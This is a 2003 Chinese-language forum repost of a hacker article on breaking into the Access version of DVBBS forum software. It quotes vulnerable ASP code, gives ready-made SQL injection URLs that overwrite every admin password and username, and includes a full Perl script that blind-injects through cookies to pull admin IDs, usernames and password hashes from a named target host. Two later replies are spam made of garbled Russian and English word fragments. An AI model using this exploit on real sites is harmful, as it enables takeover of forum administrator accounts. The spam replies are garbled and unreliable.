163 加中网–加拿大曼尼托巴中文门户网站 | 温尼伯华人论坛
标题:
[转帖]绝对背后的微笑
[打印本页]
作者:
Torune
时间:
2003-8-13 18:50
标题:
[转帖]绝对背后的微笑
作者:PsKey <PsKey@hotmail.com>
站点:http://www.isgrey.com
小组主页:http://c4st.51.net
小组论坛:http://analysist.tocare.net
>>>Dedicated This Scrap To CaoJing & GuTing<<<
Envymask的睿智帮我解决了很多问题,尽管是兄弟,我还是要说谢谢。
很吃惊地看到了DVBBS发布的安全补丁,原来有人提醒了作者程序所存在的一类漏洞。可以看出,作者对DVBBS做了全面检测,并且在消除那一类漏洞的同时,也顺带消除了其他几个安全隐患。看到自己曾耗费数小时换来的“劳动成果”被作者解决,心中有点不快。
有人、文章错误地认为:动网即使存在漏洞,也只能真正威胁MSSQL版;而ACCESS版的用户敏感信息MD5加密和后台管理的SESSION+COOKIE验证则让大家认为它牢不可破:“顶多让你得到MD5加密后的密码,你还能做什么呢?”、“我们只有暴力破解”、“动网已经是非常安全的程序了”...在一个失落的清晨,我偶然发现了这位亲爱的朋友,她静静地站在绝对的背后,微笑...
因此,本文展示如何攻破“所谓安全”的ACCESS版DVBBS;由于MSSQL版的漏洞利用简单乏味,拒绝介绍。另外,请相关朋友速打补丁。
攻击分两步,首先得到管理员MD5加密的敏感信息,接着在此基础上更改后台管理员密码。
一:得到任意用户MD5加密的敏感信息
可以利用 logout.asp、messanger.asp、myfile.asp...等一大批文件所存在的Sql Injection漏洞达到目的。这些漏洞文件中logout.asp让我稍感新意,选它来说明问题:
logout.asp:
/--------------------------------------------------------------------------
<!--#include file="conn.asp"-->
<!--#include file="inc/const.asp"-->
<%
dim activeuser
membername=request.cookies("aspsky")("username")
if session("userid")<>"" then
activeuser="delete from online where id="&session("userid")
Conn.Execute activeuser
end if
if membername<>"" then
activeuser="delete from online where username='"&membername&"'"
Conn.Execute activeuser
end if
Response.Cookies("aspsky").path=cookiepath
Response.Cookies("aspsky")("username")=""
Response.Cookies("aspsky")("password")=""
Response.Cookies("aspsky")("userclass")=""
Response.Cookies("aspsky")("userid")=""
Response.Cookies("aspsky")("userhidden")=""
Response.Cookies("aspsky")("usercookies")=""
session("userid")=""
conn.close
set conn=nothing
response.redirect("index.asp")
%>
/--------------------------------------------------------------------------
问题语句: activeuser="delete from online where username='"&membername&"'"
很多人会问:这也能利用?
能!
步骤:
1:注册一用户并登陆;
2:在COOKIE中构造membername请求logout.asp,以图程序所执行的SQL查询语句中包含我们利用逻辑关系添加的子语句;
3:构造参数请求主页面,如返回页面包含用户注册名,重复第 2 步;
4:得到敏感信息。
测试程序附后。
二:闯入后台管理
我们已经得到管理员MD5加密的敏感信息,现在可以利用COOKIE欺骗可以在前台执行管理员操作。如果你依然坚持暴力破解,并认为这很有趣,你可以停止阅读本文了。
鄙视暴力破解。不是说不现实,而是说这很乏味。
admin_recycle.asp
/--------------------------------------------------------------------------
...
topicid=request("topicid")
if request("action")<>"清空回收站" then
if topicid="" or isnull(topicid) then
Errmsg=Errmsg+"<li>"+"请选择相关帖子后进行操作。"
Founderr=true
end if
end if
if request("tablename")="topic" then
tablename="topic"
elseif instr(request("tablename"),"bbs")>0 then
tablename=request("tablename")
else
Errmsg=Errmsg+"<li>"+"错误的系统参数!"
Founderr=true
end if
if not master then
Errmsg=Errmsg+"<li>"+"您不是系统管理员或者您还没有登陆。"
Founderr=true
end if
...
'还原回收站内容
sub redel()
dim tempnum,todaynum
if instr(tablename,"bbs")>0 then
sql="update "&tablename&" set locktopic=0 where Announceid in ("&TopicID&")"
conn.execute(sql)
...
/--------------------------------------------------------------------------
问题:
1:未采用SESSION认证
2:topicid没有过滤
3:仅要求tablename包含bbs而不采取其他任何过滤(目前依然未修正)
Tablename和TopicID前后呼应,真是天合之作。提交
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20id%20in%20(9&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs
实际执行的是
update admin set [password]='ef7813118e77b0ee', lastloginip='bbs set locktopic=0 where Announceid in (' where id in (9)
这样,ID为 9 的后台管理员的密码就被修改为 ilikecat (ef7813118e77b0ee)。
提交如上URL后,页面会返回出错提示。这是因为后面的SQL语句有语法错误,别管它,我们要求执行的语句已经在它之前“正确”执行了。
注意:前台管理员和后台管理员是一一对应的,弄错了不能正确登陆后台。为了省事,你可以:
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs
所有后台管理员密码修改为 ilikecat (ef7813118e77b0ee)
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20username='catlikeme',lastloginip='bbs
所有后台管理员用户名修改为 catlikeme
当然,最好不要无聊到把所有注册用户的帐号和密码全修改了。
OK,本地COOKIE做些处理后,劳请使用 catlikeme/ilikecat 登陆后台进行“管理”。
/--------------------[获取任意用户MD5加密信息的测试程序:
#!/usr/bin/perl
#Codz By PsKey<PsKey@hotmail.com>
#Exploit of DVBBS's logout.asp
#--------------------------------------------------------------------------
# 本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户
# MD5加密密码;另外可以自动破解后台管理员ID、username、password
# 脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序
# 脚本利用方法:
# 1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid
# 2:再另注册一任意用户(此步不可少)
# 3:运行脚本,按帮助输入命令参数
# 如果是MSSQL版,请把这段糟糕的脚本扔到一边
#--------------------------------------------------------------------------
$|=1;
use Socket;
use Getopt::Std;
getopt('hpwium');
print "\n ===================================================\n";
print " Exploit of DVBBS's logout.asp\n";
print " Codz By PsKey<PsKey\@hotmail.com> \n";
print " www.isgrey.com && c4st.51.net \n";
print " Thanx Envymask<130\@21cn.com> \n";
print " ===================================================\n";
&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));
$host=$opt_h;
$port=$opt_p||80;
$path=$opt_w;
$userid=$opt_i;
$user=$opt_u;
$mode=$opt_m;
if ($opt_m eq "p") {
&usage unless defined($opt_u);
print "\nPlease wait...\n\n";
for ($j=1;$j<=16;$j++) {
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
&first;
for ($i=0;$i<@dic;$i++) {
print "$dic[$i]";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$j.th;
print "\n\/\/------------The $th word of the password is $dic[$i]";
$pws=$pws.$dic[$i];
last;
}
}
}
print "\n\nSuccessful,the full password of $user is $pws.\n";
}
elsif ($opt_m eq "b") {
#Crack ID
print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
print "\n--------->>There is one admin's id $i";
push (@id,$i);
&first;
}
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";
sleep(2);
#Crack the length of admin's username
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";
for ($j=0;$j<@id;$j++) {
print " \|\-\>cracking username's length which id is $id[$j] ...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
print "\n--------->>The length of $id[$j] is $i";
push (@len,$i);
&first;
last;
}
}
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";
sleep(2);
#Crack admin's username
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";
@dic1=(0..9);
@dic2=(a..z);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " \|\-\>cracking username which id is $id[$j] ...";
OUTER: for ($k=1;$k<=$len[$j];$k++) {
&first;
USERNAME: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
$pws=$pws.$dic[$i];
last USERNAME;
}
if ($dic[$i] eq "z") {
print "\ni can't crack this admin's name,maybe it is chinese.\n";
push (@user,"\?");
last OUTER;
}
}
}
push (@user,$pws);
print "\n========>>The username is $pws which id is $id[$j]\n";
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";
sleep(2);
#Crack admin's password
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " \|\-\>cracking password which id is $id[$j] ...";
for ($k=1;$k<=16;$k++) {
&first;
PASSWORD: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
$pws=$pws.$dic[$i];
last PASSWORD;
}
}
}
push (@pass,$pws);
print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
}
print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";
print "We got them now:\n";
printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
for ($i=0;$i<@id;$i++) {
printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
}
}
else {
&usage;
}
sub first {
$str="username=ilikecat&password=catlikeme&CookieDate=1";
$len=length($str);
$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
"Referer: http://$host$path/login.asp\n".
"Host: $host\n".
"Content-Length: $len\n".
"Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
"\n".
"$str\n\n";
print "\n.";
sendraw($req);
$req0 = "GET $path/index.asp HTTP/1.0\n".
"Referer: http://$host$path/index.asp\n".
"Host: $host\n".
"Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
print ".\n";
sendraw($req0);
}
sub second {
$req1 = "GET $path/logout.asp HTTP/1.0\n".
"Host: $host\n".
"Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
print ".";
@res = sendraw($req1);
$req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
"Referer: http://$host$path/index.asp?action=show \n".
"Host: $host\n".
"Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
print ".";
@in = sendraw($req2);
}
sub usage {
print qq~
Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>]
-h =hostname you want to attack
-p =port,80 default
-w =the web path such as "/dvbbs"
-i =the userid of ilikecat
-m =only two choice,b<background> and p<proscenium>(This option need -u)
-u =the user you want to crack
Eg: 1.Crack proscenium
$0 -h www.target.com -p 80 -w /dvbbs -i 2 -m p -u admin
2.Crack background
$0 -h www.target.com -p 80 -w /dvbbs -i 2 -m b
~;
exit;
}
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
作者:
Torune
时间:
2003-8-13 18:52
标题:
[转帖]绝对背后的微笑
文章部分内部被论坛的功能破坏了
大家可以到http://bbs.c4st.cn观看
作者:
GregoryTug
时间:
2024-4-22 20:16
Пейс
394.1
Bett
Bett
веще
Lieb
Line
учил
Трав
Савр
Ghib
Вели
4078
wwwd
25-1
Alle
Dorm
Deko
Sony
путе
Extr
Колб
служ
колл
Арти
Росс
унив
Jard
Loui
серт
Иллю
Мель
Jewe
Абел
обра
Gera
серт
серт
Фали
Publ
Рома
Ужас
курс
Тамо
Noki
Luci
Brau
Ritc
Гущи
Коли
Hond
Free
Endl
меся
MPLS
Joha
Colu
1877
пере
Sain
XVII
Штра
Sand
Немч
Габр
Черн
рабо
Fran
Дуро
Wind
Push
успе
Fall
Wind
soci
Chri
Wind
King
XVII
Busi
Wind
Bala
This
diam
Comp
КИ-3
судь
Silv
Росс
Арти
Buzz
Инай
Knit
ВС-7
Куда
зака
чист
Труб
Bubc
Крас
Мису
Bagd
Todd
Jame
John
Разм
Bram
Brai
Bren
Тауб
Huma
wwwn
Aqua
Lond
Lass
цена
клей
укра
меся
плас
作者:
GregoryTug
时间:
2024-4-22 20:17
всев
Sams
Shan
прод
B520
Gold
Book
Jewe
SQui
Chic
обще
Жура
Ефре
ARAG
хоро
хоро
буду
Chan
Hane
цвет
упак
тема
акад
Moti
пазл
Wind
wwwn
Sale
Wolf
Brau
брюк
Only
Нг-2
Span
ЛитР
Мель
ЛитР
Half
Leth
prog
писа
Zoom
Креч
Сарт
Paul
Перв
стат
Robe
Евпа
Пенз
Walt
Wind
Comm
Spar
Velv
Cras
муль
Tsui
Wind
Inte
Pulc
Edou
Gali
Форм
Show
выру
Прео
Топо
Карч
Shir
Enid
Фион
Mode
Суро
Лукь
деят
Воро
Сино
Елис
Торо
Влод
авто
Чупа
Леви
Proj
меся
меся
меся
Райн
выру
День
возр
Wilh
Погл
Look
Саак
прог
Ундз
Лыто
Коно
tuchkas
Inte
Крем
欢迎光临 163 加中网–加拿大曼尼托巴中文门户网站 | 温尼伯华人论坛 (http://appdev.163.ca/dz163/)
Powered by Discuz! X3.2